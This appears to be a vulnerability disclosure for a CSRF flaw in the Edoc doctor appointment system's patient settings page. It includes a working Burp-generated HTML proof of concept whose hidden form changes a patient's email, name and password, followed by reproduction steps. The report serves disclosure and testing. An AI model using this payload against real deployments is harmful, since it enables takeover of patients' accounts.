Cross-site request forgery (CSRF).md

Edoc-doctor-appointment-system v1.0.1 was discovered to cross-site request forgery (CSRF) vulnerability via /patient/settings.php . Allow remote attackers to hijack the authentication of users for requests that cause an unspecified impact via unknown parameters.

PoC

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.doctor111.com/patient/edit-user.php" method="POST">
      <input type="hidden" name="id00" value="3" />
      <input type="hidden" name="oldemail" value="dsa&#64;qw&#46;cn" />
      <input type="hidden" name="email" value="dsaaaaaaa&#64;qw&#46;cn" />
      <input type="hidden" name="name" value="w&#32;eesssss" />
      <input type="hidden" name="nic" value="01" />
      <input type="hidden" name="Tele" value="0171234567" />
      <input type="hidden" name="address" value="rew" />
      <input type="hidden" name="password" value="dsa&#64;qw&#46;cn1" />
      <input type="hidden" name="cpassword" value="dsa&#64;qw&#46;cn1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

vendor : https://github.com/HashenUdara/edoc-doctor-appointment-system

Vulnerability Position : http://ip/patient/settings.php

Log in to the http://ip/login.php

Visit http://ip/patient/settings.php , will access the page of the module.

Click the View button.

Change name : qq ww to hackhack.

Use burpsuite to capture request packet , and then click the Save button.

Generate CSRF PoC in burpsuite.

Copy HTML save as test.html.

Attention : You must drop this captured request packet after Copy HTML.

Then open test.html with your Browser , click Submit request button.

You will see pop -up window , and your name is hackhack